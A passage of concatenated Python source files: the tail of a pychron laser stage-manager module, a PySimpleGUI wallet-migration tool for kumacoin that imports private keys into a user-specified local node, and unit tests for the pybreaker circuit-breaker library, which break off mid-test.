# map the position to calibrated space
pos = self.get_calibrated_position(pos, key=key)
else:
# check if this is an interpolated position
# if so probably want to do an autocentering routine
hole = self.stage_map.get_hole(key)
if hole.interpolated:
self.info('using an interpolated value')
else:
self.info('using previously calculated corrected position')
autocentered_position = True
try:
self.stage_controller.linear_move(block=True, source='move_to_hole {}'.format(pos),
raise_zero_displacement=True, *pos)
except TargetPositionError as e:
self.warning('(001) Move to {} failed'.format(pos))
self.parent.emergency_shutoff(str(e))
return
except ZeroDisplacementException:
correct_position = False
try:
self._move_to_hole_hook(key, correct_position,
autocentered_position)
except TargetPositionError as e:
self.warning('(002) Move failed. {}'.format(e))
self.parent.emergency_shutoff(str(e))
return
self.finish_move_to_hole(user_entry)
self.info('Move complete')
def _move_to_hole_hook(self, *args):
pass
def _move_to_point_hook(self):
pass
# ===============================================================================
# Property Get / Set
# ===============================================================================
def _set_stage_map(self, v):
if v in self.stage_map_names:
for root, ext in ((self.root, '.txt'), (paths.user_points_dir, '.yaml')):
p = os.path.join(root, add_extension(v, ext))
if os.path.isfile(p):
self.info('setting stage map to {}'.format(v))
sm = self.stage_map_klass(file_path=p)
self.canvas.set_map(sm)
self.tray_calibration_manager.load_calibration(stage_map=v)
self.points_programmer.load_stage_map(sm)
return True
else:
self.warning('No stage map named "{}"'.format(v))
return False
def _get_calibrate_stage_label(self):
if self._calibration_state == 'set_center':
r = 'Locate Center'
elif self._calibration_state == 'set_right':
r = 'Locate Right'
else:
r = 'Calibrate Stage'
return r
def _get_program_points_label(self):
return 'Program Points' if not self.canvas.markup else 'End Program'
def _validate_hole(self, v):
nv = None
try:
if v.strip():
nv = int(v)
except TypeError:
self.warning('invalid hole {}'.format(v))
return nv
# def _get_calibrated_position_entry(self):
# return self._calibrated_position
#
# def _set_calibrated_position_entry(self, v):
# self._calibrated_position = v
# if XY_REGEX.match(v):
# self._move_to_calibrated_position(v)
# else:
# self.move_to_hole(v)
def _move_to_calibrated_position(self, pos):
try:
args = csv_to_floats(pos)
except ValueError:
self.warning('invalid calibrated position "{}". Could not convert to floats'.format(pos))
return
if len(args) == 2:
x, y = args
self.linear_move(x, y, use_calibration=True, block=False)
else:
self.warning('invalid calibrated position. incorrect number of arguments "{}"'.format(args))
def _set_point(self, v):
if self.canvas.calibrate:
self.warning_dialog('Cannot move while calibrating')
return
if self.canvas.markup:
self.warning_dialog('Cannot move while adding/editing points')
return
if (self.move_thread is None or not self.move_thread.isRunning()) and v is not self._point:
pos = self.canvas.get_item('point', int(v) - 1)
if pos is not None:
self._point = v
self.move_thread = Thread(target=self._move_to_point, args=(pos,))
self.move_thread.start()
else:
err = 'Invalid point {}'.format(v)
self.warning(err)
return err
def _get_point(self):
return self._point
# ===============================================================================
# handlers
# ===============================================================================
def _manual_override_position_button_fired(self):
sm = self.stage_map
pos = self.calibrated_position_entry
hole = self.stage_map.get_hole(pos)
if hole is not None:
x, y = self.stage_controller.x, self.stage_controller.y
sm.set_hole_correction(pos, x, y)
sm.dump_correction_file()
self.info('updated {} correction file. Saved {}: {},{}'.format(sm.name, pos, x, y))
def _stop_button_fired(self):
self._stop()
def _ejoystick_fired(self):
self.joystick = not self.joystick
if self.joystick:
self.stage_controller.enable_joystick()
self.joystick_label = 'Disable Joystick'
self.joystick_timer = self.timer_factory(func=self._joystick_inprogress_update)
else:
if self.joystick_timer is not None:
self.joystick_timer.Stop()
self.stage_controller.disable_joystick()
self.joystick_label = 'Enable Joystick'
def _home_fired(self):
"""
"""
t = Thread(name='stage.home', target=self._home)
t.start()
# need to store a reference to thread so it is not garbage collected
self.move_thread = t
# do_later(self._home)
def _test_fired(self):
# self.do_pattern('testpattern')
self.do_pattern('pattern003')
# ===============================================================================
# factories
# ===============================================================================
def _motion_configure_factory(self, **kw):
return MotionControllerManager(motion_controller=self.stage_controller,
application=self.application,
**kw)
def _stage_controller_factory(self):
if self.stage_controller_klass == 'Newport':
from pychron.hardware.newport.newport_motion_controller import NewportMotionController
factory = NewportMotionController
elif self.stage_controller_klass == 'Aerotech':
from pychron.hardware.aerotech.aerotech_motion_controller import AerotechMotionController
factory = AerotechMotionController
m = factory(name='{}controller'.format(self.name),
configuration_name='stage_controller',
configuration_dir_name=self.configuration_dir_name,
parent=self)
return m
def _canvas_factory(self):
"""
"""
w = 640 / 2.0 / 23.2
h = 0.75 * w
l = LaserTrayCanvas(stage_manager=self,
padding=[30, 5, 5, 30],
map=self.stage_map,
view_x_range=[-w, w],
view_y_range=[-h, h])
return l
# ===============================================================================
# defaults
# ===============================================================================
def _motion_controller_manager_default(self):
return self._motion_configure_factory()
def _title_default(self):
return '%s Stage Manager' % self.name[:-5].capitalize()
def _points_programmer_default(self):
pp = PointsProgrammer(canvas=self.canvas,
stage_map_klass=self.stage_map_klass,
stage_manager=self)
pp.on_trait_change(self.move_to_point, 'point')
pp.on_trait_change(self.move_polygon, 'polygon')
pp.on_trait_change(self.move_polyline, 'line')
return pp
# ===============================================================================
# mass spec hacks
# ===============================================================================
# _temp_position = None
# def _get_temp_position(self):
# return self._temp_position
#
# def _set_temp_position(self, v):
# self._temp_position = v
#
# temp_position = property(fget=_get_temp_position,
# fset=_set_temp_position)
if __name__ == '__main__':
from pychron.core.helpers.logger_setup import logging_setup
logging_setup('stage_manager')
name = 'diode'
s = StageManager(
name='{}stage'.format(name),
configuration_dir_name=name,
# parent = DummyParent(),
window_width=945,
window_height=545
)
# from pychron.initializer import Initializer
#
# i = Initializer()
# i.add_initialization(dict(name = 'stage_manager',
# manager = s
# ))
# i.run()
# s.update_axes()
s.load()
s.stage_controller.bootstrap()
s.configure_traits()
# ========================EOF============================
# view groups
# ===============================================================================
# def _hole__group__(self):
# g = Group(HGroup(Item('hole'), spring))
# return g
# def _position__group__(self):
# g = Group(HGroup(Item('calibrated_position_entry', label='Position',
# tooltip='Enter a x,y point in reference frame space',
# ), spring))
# g = Group(
# Item('calibrated_position_entry',
# show_label=False,
# tooltip='Enter a positon e.g 1 for a hole, or 3,4 for X,Y'
# ), label='Calibrated Position',
# show_border=True)
# return g
# def _button__group__(self):
# '''
# '''
# vg = VGroup()
#
# home = self._button_factory(*self.buttons[0])
# calibrate_stage = self._button_factory(*self.buttons[1])
#
# vg.content.append(HGroup(calibrate_stage, home,
# Item('home_option',
# editor=EnumEditor(values=self.home_options),
# show_label=False)))
#
# if len(self.buttons) > 2:
# # vg.content.append(self._button_group_factory(self.buttons[:2], orientation = 'h'))
# vg.content.append(self._button_group_factory(self.buttons[2:], orientation='h'))
# return vg
# def _axis__group__(self):
# '''
# '''
# return Item('stage_controller', show_label=False, style='custom')
#
#
# def _sconfig__group__(self):
# '''
# '''
# return Group(
# # Item('pattern_manager',
# # label='Pattern',
# # editor=InstanceEditor(view='execute_view'),
# # show_label=False, style='custom'
# # ),
#
# Group(
# Item('canvas', show_label=False,
# editor=InstanceEditor(view='config_view'),
# style='custom'
# ),
# label='Canvas'),
#
# # Group(Item('motion_controller_manager', editor=InstanceEditor(view='configure_view'),
# # style='custom', show_label=False),
# # Item('motion_profiler', style='custom', show_label=False),
# # label='Motion'
# # ),
#
# # Group(
# # self._button_factory('program_points', 'program_points_label'),
# # Item('accept_point', show_label=False),
# # Item('load_points', show_label=False),
# # Item('save_points', show_label=False),
# # Item('clear_points', show_label=False),
# # label='Points'),
# Item('points_programmer',
# label='Points',
# show_label=False, style='custom'),
# Item('tray_calibration_manager',
# label='Calibration',
# show_label=False, style='custom'),
# # Item('pattern_manager',
# # label='Pattern',
# # editor=InstanceEditor(view='execute_view'),
# # show_label=False, style='custom'
# # ),
#
# # Item('output', show_label = False, style = 'custom'),
#
# # Item('jog_manager', show_label = False, style = 'custom',
# # resizable=False
# # ),
# layout='tabbed'
# )
|
gui.py
|
from kuma1to2 import *
import PySimpleGUI as sg
import threading
import os
def main():
system_msg = sg.Multiline(
"msg: please fill in the blanks\n",
text_color="gray", size=(60, 10), autoscroll=True)
password_input = sg.Input("", disabled=True)
ok_button = sg.OK()
layout = [
[sg.Text("warning: Do not forget backup original wallet!", text_color="red")],
[
sg.Text("you need set password below if encrypt wallet"),
sg.Checkbox("encrypted", enable_events=True, default=False),
],
[password_input],
[sg.Text("wallet.dat"), sg.Input(), sg.FileBrowse()],
[
sg.Text("endpoint"),
sg.Input("http", size=(10, None)),
sg.Text("://"),
sg.Input("127.0.0.1", size=(10, None)),
sg.Text(":"),
sg.Input("3000", size=(6, None))
],
[
sg.Text("authentication"),
sg.Input("user", size=(20, None)),
sg.Text(":"),
sg.Input("password", size=(20, None)),
],
[
sg.Text("human readable part(hrp)"),
sg.Input("test", size=(20, None)),
],
[sg.Text("system message")],
[system_msg],
[ok_button, sg.CloseButton("close")],
]
window = sg.Window("kumacoin 1.0⇒2.0 swapper (%s)" % __version__,
layout, debugger_enabled=False)
window.read_call_from_debugger = True
while True:
try:
event, values = window.read()
if event in (None, 'close'):
# if user closes window or clicks cancel
break
if event == 0:
# checkbox
password_input.update(disabled=not values[event])
continue
if event != "OK":
system_msg.update("warning unknown event `%s`\n" % event, append=True)
continue
# setup params
password = values[1] if values[0] else ""
system_msg.update("msg: password=`%s`\n" % password, append=True)
wallet_path = values[2]
system_msg.update("msg: wallet=`%s`\n" % wallet_path, append=True)
url = "%s://%s:%s@%s:%s/private/importprivatekey" \
% (values[3], values[6], values[7], values[4], values[5])
system_msg.update("msg: url=`%s`\n" % url, append=True)
hrp = values[8]
system_msg.update("msg: hrp=`%s`\n" % hrp, append=True)
# check
if not os.path.exists(wallet_path):
system_msg.update("error: not found wallet.dat\n", append=True)
continue
if not os.path.isfile(wallet_path):
system_msg.update("error: path is not file\n", append=True)
continue
# search
threading.Thread(
target=task, args=(password, wallet_path, hrp, url, system_msg, ok_button)).start()
except Exception as e:
system_msg.update("error: `%s`\n" % str(e), append=True)
if __name__ == '__main__':
main()
|
tests.py
|
#-*- coding:utf-8 -*-
import unittest
from datetime import datetime
from time import sleep
import mock
from pytest import fail
from tornado import gen
from tornado import testing
from pybreaker import *
class CircuitBreakerStorageBasedTestCase(object):
"""
Mix in to test against different storage backings. Depends on
`self.breaker` and `self.breaker_kwargs`.
"""
def test_successful_call(self):
"""CircuitBreaker: it should keep the circuit closed after a successful
call.
"""
def func(): return True
self.assertTrue(self.breaker.call(func))
self.assertEqual(0, self.breaker.fail_counter)
self.assertEqual('closed', self.breaker.current_state)
def test_one_failed_call(self):
"""CircuitBreaker: it should keep the circuit closed after a few
failures.
"""
def func(): raise NotImplementedError()
self.assertRaises(NotImplementedError, self.breaker.call, func)
self.assertEqual(1, self.breaker.fail_counter)
self.assertEqual('closed', self.breaker.current_state)
def test_one_successful_call_after_failed_call(self):
"""CircuitBreaker: it should keep the circuit closed after few mixed
outcomes.
"""
def suc(): return True
def err(): raise NotImplementedError()
self.assertRaises(NotImplementedError, self.breaker.call, err)
self.assertEqual(1, self.breaker.fail_counter)
self.assertTrue(self.breaker.call(suc))
self.assertEqual(0, self.breaker.fail_counter)
self.assertEqual('closed', self.breaker.current_state)
def test_several_failed_calls(self):
"""CircuitBreaker: it should open the circuit after many failures.
"""
self.breaker = CircuitBreaker(fail_max=3, **self.breaker_kwargs)
def func(): raise NotImplementedError()
self.assertRaises(NotImplementedError, self.breaker.call, func)
self.assertRaises(NotImplementedError, self.breaker.call, func)
# Circuit should open
self.assertRaises(CircuitBreakerError, self.breaker.call, func)
self.assertEqual(3, self.breaker.fail_counter)
self.assertEqual('open', self.breaker.current_state)
def test_traceback_in_circuitbreaker_error(self):
"""CircuitBreaker: it should open the circuit after many failures.
"""
self.breaker = CircuitBreaker(fail_max=3, **self.breaker_kwargs)
def func(): raise NotImplementedError()
self.assertRaises(NotImplementedError, self.breaker.call, func)
self.assertRaises(NotImplementedError, self.breaker.call, func)
# Circuit should open
try:
self.breaker.call(func)
fail('CircuitBreakerError should throw')
except CircuitBreakerError as e:
import traceback
self.assertIn('NotImplementedError', traceback.format_exc())
self.assertEqual(3, self.breaker.fail_counter)
self.assertEqual('open', self.breaker.current_state)
def test_failed_call_after_timeout(self):
"""CircuitBreaker: it should half-open the circuit after timeout.
"""
self.breaker = CircuitBreaker(fail_max=3, reset_timeout=0.5, **self.breaker_kwargs)
def func(): raise NotImplementedError()
self.assertRaises(NotImplementedError, self.breaker.call, func)
self.assertRaises(NotImplementedError, self.breaker.call, func)
self.assertEqual('closed', self.breaker.current_state)
# Circuit should open
self.assertRaises(CircuitBreakerError, self.breaker.call, func)
self.assertEqual(3, self.breaker.fail_counter)
# Wait for timeout
sleep(0.6)
# Circuit should open again
self.assertRaises(CircuitBreakerError, self.breaker.call, func)
self.assertEqual(4, self.breaker.fail_counter)
self.assertEqual('open', self.breaker.current_state)
def test_successful_after_timeout(self):
"""CircuitBreaker: it should close the circuit when a call succeeds
after timeout. The successful function should only be called once.
"""
self.breaker = CircuitBreaker(fail_max=3, reset_timeout=1, **self.breaker_kwargs)
suc = mock.MagicMock(return_value=True)
def err(): raise NotImplementedError()
self.assertRaises(NotImplementedError, self.breaker.call, err)
self.assertRaises(NotImplementedError, self.breaker.call, err)
self.assertEqual('closed', self.breaker.current_state)
# Circuit should open
self.assertRaises(CircuitBreakerError, self.breaker.call, err)
self.assertRaises(CircuitBreakerError, self.breaker.call, suc)
self.assertEqual(3, self.breaker.fail_counter)
# Wait for timeout, at least a second since redis rounds to a second
sleep(2)
# Circuit should close again
self.assertTrue(self.breaker.call(suc))
self.assertEqual(0, self.breaker.fail_counter)
self.assertEqual('closed', self.breaker.current_state)
self.assertEqual(1, suc.call_count)
def test_failed_call_when_halfopen(self):
"""CircuitBreaker: it should open the circuit when a call fails in
half-open state.
"""
def fun(): raise NotImplementedError()
self.breaker.half_open()
self.assertEqual(0, self.breaker.fail_counter)
self.assertEqual('half-open', self.breaker.current_state)
# Circuit should open
self.assertRaises(CircuitBreakerError, self.breaker.call, fun)
self.assertEqual(1, self.breaker.fail_counter)
self.assertEqual('open', self.breaker.current_state)
def test_successful_call_when_halfopen(self):
"""CircuitBreaker: it should close the circuit when a call succeeds in
half-open state.
"""
def fun(): return True
self.breaker.half_open()
self.assertEqual(0, self.breaker.fail_counter)
self.assertEqual('half-open', self.breaker.current_state)
# Circuit should open
self.assertTrue(self.breaker.call(fun))
self.assertEqual(0, self.breaker.fail_counter)
self.assertEqual('closed', self.breaker.current_state)
def test_close(self):
"""CircuitBreaker: it should allow the circuit to be closed manually.
"""
self.breaker = CircuitBreaker(fail_max=3, **self.breaker_kwargs)
def func(): raise NotImplementedError()
self.assertRaises(NotImplementedError, self.breaker.call, func)
self.assertRaises(NotImplementedError, self.breaker.call, func)
# Circuit should open
self.assertRaises(CircuitBreakerError, self.breaker.call, func)
self.assertRaises(CircuitBreakerError, self.breaker.call, func)
self.assertEqual(3, self.breaker.fail_counter)
self.assertEqual('open', self.breaker.current_state)
# Circuit should close again
self.breaker.close()
self.assertEqual(0, self.breaker.fail_counter)
self.assertEqual('closed', self.breaker.current_state)
def test_transition_events(self):
"""CircuitBreaker: it should call the appropriate functions on every
state transition.
"""
class Listener(CircuitBreakerListener):
def __init__(self):
self.out = ''
def state_change(self, cb, old_state, new_state):
assert cb
if old_state: self.out += old_state.name
if new_state: self.out += '->' + new_state.name
self.out += ','
listener = Listener()
self.breaker = CircuitBreaker(listeners=(listener,), **self.breaker_kwargs)
self.assertEqual('closed', self.breaker.current_state)
self.breaker.open()
self.assertEqual('open', self.breaker.current_state)
self.breaker.half_open()
self.assertEqual('half-open', self.breaker.current_state)
self.breaker.close()
self.assertEqual('closed', self.breaker.current_state)
self.assertEqual('closed->open,open->half-open,half-open->closed,', \
listener.out)
def test_call_events(self):
"""CircuitBreaker: it should call the appropriate functions on every
successful/failed call.
"""
self.out = ''
def suc(): return True
def err(): raise NotImplementedError()
class Listener(CircuitBreakerListener):
def __init__(self):
self.out = ''
def before_call(self, cb, func, *args, **kwargs):
assert cb
self.out += '-'
def success(self, cb):
assert cb
self.out += 'success'
def failure(self, cb, exc):
assert cb; assert exc
self.out += 'failure'
listener = Listener()
self.breaker = CircuitBreaker(listeners=(listener,), **self.breaker_kwargs)
self.assertTrue(self.breaker.call(suc))
self.assertRaises(NotImplementedError, self.breaker.call, err)
self.assertEqual('-success-failure', listener.out)
def test_generator(self):
"""CircuitBreaker: it should inspect generator values.
"""
@self.breaker
def suc(value):
"Docstring"
yield value
@self.breaker
def err(value):
"Docstring"
x = yield value
raise NotImplementedError(x)
s = suc(True)
e = err(True)
next(e)
self.assertRaises(NotImplementedError, e.send, True)
self.assertEqual(1, self.breaker.fail_counter)
self.assertTrue(next(s))
self.assertRaises((StopIteration, RuntimeError), lambda: next(s))
self.assertEqual(0, self.breaker.fail_counter)
class CircuitBreakerConfigurationTestCase(object):
"""
Tests for the CircuitBreaker class.
"""
def test_default_state(self):
"""CircuitBreaker: it should get initial state from state_storage.
"""
for state in (STATE_OPEN, STATE_CLOSED, STATE_HALF_OPEN):
storage = CircuitMemoryStorage(state)
breaker = CircuitBreaker(state_storage=storage)
self.assertEqual(breaker.state.name, state)
def test_default_params(self):
"""CircuitBreaker: it should define smart defaults.
"""
self.assertEqual(0, self.breaker.fail_counter)
self.assertEqual(60, self.breaker.reset_timeout)
self.assertEqual(5, self.breaker.fail_max)
self.assertEqual('closed', self.breaker.current_state)
self.assertEqual((), self.breaker.excluded_exceptions)
self.assertEqual((), self.breaker.listeners)
self.assertEqual('memory', self.breaker._state_storage.name)
def test_new_with_custom_reset_timeout(self):
"""CircuitBreaker: it should support a custom reset timeout value.
"""
self.breaker = CircuitBreaker(reset_timeout=30)
self.assertEqual(0, self.breaker.fail_counter)
self.assertEqual(30, self.breaker.reset_timeout)
self.assertEqual(5, self.breaker.fail_max)
self.assertEqual((), self.breaker.excluded_exceptions)
self.assertEqual((), self.breaker.listeners)
self.assertEqual('memory', self.breaker._state_storage.name)
def test_new_with_custom_fail_max(self):
"""CircuitBreaker: it should support a custom maximum number of
failures.
"""
self.breaker = CircuitBreaker(fail_max=10)
self.assertEqual(0, self.breaker.fail_counter)
self.assertEqual(60, self.breaker.reset_timeout)
self.assertEqual(10, self.breaker.fail_max)
self.assertEqual((), self.breaker.excluded_exceptions)
self.assertEqual((), self.breaker.listeners)
self.assertEqual('memory', self.breaker._state_storage.name)
def test_new_with_custom_excluded_exceptions(self):
"""CircuitBreaker: it should support a custom list of excluded
exceptions.
"""
self.breaker = CircuitBreaker(exclude=[Exception])
self.assertEqual(0, self.breaker.fail_counter)
self.assertEqual(60, self.breaker.reset_timeout)
self.assertEqual(5, self.breaker.fail_max)
self.assertEqual((Exception,), self.breaker.excluded_exceptions)
self.assertEqual((), self.breaker.listeners)
self.assertEqual('memory', self.breaker._state_storage.name)
def test_fail_max_setter(self):
"""CircuitBreaker: it should allow the user to set a new value for
'fail_max'.
"""
self.assertEqual(5, self.breaker.fail_max)
self.breaker.fail_max = 10
self.assertEqual(10, self.breaker.fail_max)
def test_reset_timeout_setter(self):
"""CircuitBreaker: it should allow the user to set a new value for
'reset_timeout'.
"""
self.assertEqual(60, self.breaker.reset_timeout)
self.breaker.reset_timeout = 30
self.assertEqual(30, self.breaker.reset_timeout)
def test_call_with_no_args(self):
"""CircuitBreaker: it should be able to invoke functions with no-args.
"""
def func(): return True
self.assertTrue(self.breaker.call(func))
def test_call_with_args(self):
"""CircuitBreaker: it should be able to invoke functions with args.
"""
def func(arg1, arg2): return [arg1, arg2]
self.assertEqual([42, 'abc'], self.breaker.call(func, 42, 'abc'))
def test_call_with_kwargs(self):
"""CircuitBreaker: it should be able to invoke functions with kwargs.
"""
def func(**kwargs): return kwargs
self.assertEqual({'a':1, 'b':2}, self.breaker.call(func, a=1, b=2))
@testing.gen_test
def test_call_async_with_no_args(self):
"""CircuitBreaker: it should be able to invoke async functions with no-args.
"""
@gen.coroutine
def func(): return True
ret = yield self.breaker.call(func)
self.assertTrue(ret)
@testing.gen_test
def test_call_async_with_args(self):
"""CircuitBreaker: it should be able to invoke async functions with args.
"""
@gen.coroutine
def func(arg1, arg2): return [arg1, arg2]
ret = yield self.breaker.call(func, 42, 'abc')
self.assertEqual([42, 'abc'], ret)
@testing.gen_test
def test_call_async_with_kwargs(self):
"""CircuitBreaker: it should be able to invoke async functions with kwargs.
"""
@gen.coroutine
def func(**kwargs): return kwargs
ret = yield self.breaker.call(func, a=1, b=2)
self.assertEqual({'a':1, 'b':2}, ret)
def test_add_listener(self):
"""CircuitBreaker: it should allow the user to add a listener at a
later time.
"""
self.assertEqual((), self.breaker.listeners)
first = CircuitBreakerListener()
self.breaker.add_listener(first)
self.assertEqual((first,), self.breaker.listeners)
second = CircuitBreakerListener()
self.breaker.add_listener(second)
self.assertEqual((first, second), self.breaker.listeners)
def test_add_listeners(self):
"""CircuitBreaker: it should allow the user to add listeners at a
later time.
"""
first, second = CircuitBreakerListener(), CircuitBreakerListener()
self.breaker.add_listeners(first, second)
self.assertEqual((first, second), self.breaker.listeners)
def test_remove_listener(self):
"""CircuitBreaker: it should allow the user to remove a listener.
"""
first = CircuitBreakerListener()
self.breaker.add_listener(first)
self.assertEqual((first,), self.breaker.listeners)
self.breaker.remove_listener(first)
self.assertEqual((), self.breaker.listeners)
def test_excluded_exceptions(self):
"""CircuitBreaker: it should ignore specific exceptions.
"""
self.breaker = CircuitBreaker(exclude=[LookupError])
def err_1(): raise NotImplementedError()
def err_2(): raise LookupError()
def err_3(): raise KeyError()
self.assertRaises(NotImplementedError, self.breaker.call, err_1)
self.assertEqual(1, self.breaker.fail_counter)
# LookupError is not considered a system error
self.assertRaises(LookupError, self.breaker.call, err_2)
self.assertEqual(0, self.breaker.fail_counter)
self.assertRaises(NotImplementedError, self.breaker.call, err_1)
self.assertEqual(1, self.breaker.fail_counter)
# Should consider subclasses as well (KeyError is a subclass of
# LookupError)
self.assertRaises(KeyError, self.breaker.call, err_3)
self.assertEqual(0, self.breaker.fail_counter)
def test_excluded_callable_exceptions(self):
"""CircuitBreaker: it should ignore specific exceptions that return true from a filtering callable.
"""
class TestException(Exception):
def __init__(self, value):
self.value = value
filter_function = lambda e: type(e) == TestException and e.value == 'good'
self.breaker = CircuitBreaker(exclude=[filter_function])
def err_1(): raise TestException("bad")
def err_2(): raise TestException("good")
def err_3(): raise NotImplementedError()
self.assertRaises(TestException, self.breaker.call, err_1)
self.assertEqual(1, self.breaker.fail_counter)
self.assertRaises(TestException, self.breaker.call, err_2)
self.assertEqual(0, self.breaker.fail_counter)
self.assertRaises(NotImplementedError, self.breaker.call, err_3)
self.assertEqual(1, self.breaker.fail_counter)
def test_excluded_callable_and_types_exceptions(self):
"""CircuitBreaker: it should allow a mix of exclusions that includes both filter functions and types.
"""
class TestException(Exception):
def __init__(self, value):
self.value = value
filter_function = lambda e: type(e) == TestException and e.value == 'good'
self.breaker = CircuitBreaker(exclude=[filter_function, LookupError])
def err_1(): raise TestException("bad")
def err_2(): raise TestException("good")
def err_3(): raise NotImplementedError()
def err_4(): raise LookupError()
self.assertRaises(TestException, self.breaker.call, err_1)
self.assertEqual(1, self.breaker.fail_counter)
self.assertRaises(TestException, self.breaker.call, err_2)
self.assertEqual(0, self.breaker.fail_counter)
self.assertRaises(NotImplementedError, self.breaker.call, err_3)
self.assertEqual(1, self.breaker.fail_counter)
self.assertRaises(LookupError, self.breaker.call, err_4)
self.assertEqual(0, self.breaker.fail_counter)
def test_add_excluded_exception(self):
"""CircuitBreaker: it should allow the user to exclude an exception at a
later time.
"""
self.assertEqual((), self.breaker.excluded_exceptions)
self.breaker.add_excluded_exception(NotImplementedError)
self.assertEqual((NotImplementedError,), \
self.breaker.excluded_exceptions)
self.breaker.add_excluded_exception(Exception)
self.assertEqual((NotImplementedError, Exception), \
self.breaker.excluded_exceptions)
def test_add_excluded_exceptions(self):
"""CircuitBreaker: it should allow the user to exclude exceptions at a
later time.
"""
self.breaker.add_excluded_exceptions(NotImplementedError, Exception)
self.assertEqual((NotImplementedError, Exception), \
self.breaker.excluded_exceptions)
def test_remove_excluded_exception(self):
"""CircuitBreaker: it should allow the user to remove an excluded
exception.
"""
self.breaker.add_excluded_exception(NotImplementedError)
self.assertEqual((NotImplementedError,), \
self.breaker.excluded_exceptions)
self.breaker.remove_excluded_exception(NotImplementedError)
self.assertEqual((), self.breaker.excluded_exceptions)
def test_decorator(self):
"""CircuitBreaker: it should be a decorator.
"""
@self.breaker
def suc(value):
"Docstring"
return value
@self.breaker
def err(value):
"Docstring"
raise NotImplementedError()
self.assertEqual('Docstring', suc.__doc__)
self.assertEqual('Docstring', err.__doc__)
self.assertEqual('suc', suc.__name__)
self.assertEqual('err', err.__name__)
self.assertRaises(NotImplementedError, err, True)
self.assertEqual(1, self.breaker.fail_counter)
self.assertTrue(suc(True))
self.assertEqual(0, self.breaker.fail_counter)
@testing.gen_test
def test_decorator_call_future(self):
"""CircuitBreaker: it should be a decorator.
"""
@self.breaker(__pybreaker_call_async=True)
@gen.coroutine
def suc(value):
"Docstring"
raise gen.Return(value)
@self.breaker(__pybreaker_call_async=True)
@gen.coroutine
def err(value):
"Docstring"
raise NotImplementedError()
self.assertEqual('Docstring', suc.__doc__)
self.assertEqual('Docstring', err.__doc__)
self.assertEqual('suc', suc.__name__)
self.assertEqual('err', err.__name__)
with self.assertRaises(NotImplementedError):
yield err(True)
self.assertEqual(1, self.breaker.fail_counter)
ret = yield suc(True)
self.assertTrue(ret)
self.assertEqual(0, self.breaker.fail_counter)
@mock.patch('pybreaker.HAS_TORNADO_SUPPORT', False)
def test_no_tornado_raises(self):
with self.assertRaises(ImportError):
def func(): return True
self.breaker(func, __pybreaker_call_async=True)
def test_name(self):
"""CircuitBreaker: it should allow an optional name to be set and
retrieved.
"""
name = "test_breaker"
self.breaker = CircuitBreaker(name=name)
self.assertEqual(self.breaker.name, name)
name = "breaker_test"
self.breaker.name = name
self.assertEqual(self.breaker.name, name)
class CircuitBreakerTestCase(testing.AsyncTestCase, CircuitBreakerStorageBasedTestCase, CircuitBreakerConfigurationTestCase):
"""
Tests for the CircuitBreaker class.
"""
def setUp(self):
super(CircuitBreakerTestCase, self).setUp()
self.breaker_kwargs = {}
self.breaker = CircuitBreaker()
def test_create_new_state__bad_state(self):
with self.assertRaises(ValueError):
self.breaker._create_new_state('foo')
@mock.patch('pybreaker.CircuitOpenState')
def test_notify_not_called_on_init(self, open_state):
storage = CircuitMemoryStorage('open')
breaker = CircuitBreaker(state_storage=storage)
open_state.assert_called_once_with(breaker, prev_state=None, notify=False)
@mock.patch('pybreaker.CircuitOpenState')
def test_notify_called_on_state_change(self, open_state):
storage = CircuitMemoryStorage('closed')
breaker = CircuitBreaker(state_storage=storage)
prev_state = breaker.state
breaker.state = 'open'
open_state.assert_called_once_with(breaker, prev_state=prev_state, notify=True)
def test_failure_count_not_reset_during_creation(self):
for state in (STATE_OPEN, STATE_CLOSED, STATE_HALF_OPEN):
storage = CircuitMemoryStorage(state)
storage.increment_counter()
breaker = CircuitBreaker(state_storage=storage)
self.assertEqual(breaker.state.name, state)
self.assertEqual(breaker.fail_counter, 1)
def test_state_opened_at_not_reset_during_creation(self):
for state in (STATE_OPEN, STATE_CLOSED, STATE_HALF_OPEN):
storage = CircuitMemoryStorage(state)
now = datetime.now()
storage.opened_at = now
breaker = CircuitBreaker(state_storage=storage)
self.assertEqual(breaker.state.name, state)
self.assertEqual(storage.opened_at, now)
import fakeredis
import logging
from redis.exceptions import RedisError
class CircuitBreakerRedisTestCase(unittest.TestCase, CircuitBreakerStorageBasedTestCase):
"""
Tests for the CircuitBreaker class.
"""
def setUp(self):
self.redis = fakeredis.FakeStrictRedis()
self.breaker_kwargs = {'state_storage': CircuitRedisStorage('closed', self.redis)}
self.breaker = CircuitBreaker(**self.breaker_kwargs)
def tearDown(self):
self.redis.flushall()
def test_namespace(self):
self.redis.flushall()
self.breaker_kwargs = {'state_storage': CircuitRedisStorage('closed', self.redis, namespace='my_app')}
self.breaker = CircuitBreaker(**self.breaker_kwargs)
def func(): raise NotImplementedError()
self.assertRaises(NotImplementedError, self.breaker.call, func)
keys = self.redis.keys()
self.assertEqual(2, len(keys))
self.assertTrue(keys[0].decode('utf-8').startswith('my_app'))
self.assertTrue(keys[1].decode('utf-8').startswith('my_app'))
def test_fallback_state(self):
logger = logging.getLogger('pybreaker')
logger.setLevel(logging.FATAL)
self.breaker_kwargs = {'state_storage': CircuitRedisStorage('closed', self.redis, fallback_circuit_state='open')}
self.breaker = CircuitBreaker(**self.breaker_kwargs)
def func(k): raise RedisError()
with mock.patch.object(self.redis, 'get', new=func):
state = self.breaker.state
self.assertEqual('open', state.name)
def test_missing_state(self):
"""CircuitBreakerRedis: If state on Redis is missing, it should set the
fallback circuit state and reset the fail counter to 0.
"""
self.breaker_kwargs = {'state_storage': CircuitRedisStorage('closed', self.redis, fallback_circuit_state='open')}
self.breaker = CircuitBreaker(**self.breaker_kwargs)
def func(): raise NotImplementedError()
self.assertRaises(NotImplementedError, self.breaker.call, func)
self.assertEqual(1, self.breaker.fail_counter)
with mock.patch.object(self.redis, 'get', new=lambda k: None):
state = self.breaker.state
self.assertEqual('open', state.name)
self.assertEqual(0, self.breaker.fail_counter)
import threading
from types import MethodType
class CircuitBreakerThreadsTestCase(unittest.TestCase):
"""
Tests to reproduce common synchronization errors on CircuitBreaker class.
"""
def setUp(self):
self.breaker = CircuitBreaker(fail_max=3000, reset_timeout=1)
def _start_threads(self, target, n):
"""
Starts `n` threads that calls `target` and waits for them to finish.
"""
threads = [threading.Thread(target=target) for i in range(n)]
[t.start() for t in threads]
[t.join() for t in threads]
def _mock_function(self, obj, func):
"""
Replaces a bounded function in `self.breaker` by another.
"""
setattr(obj, func.__name__, MethodType(func, self.breaker))
def test_fail_thread_safety(self):
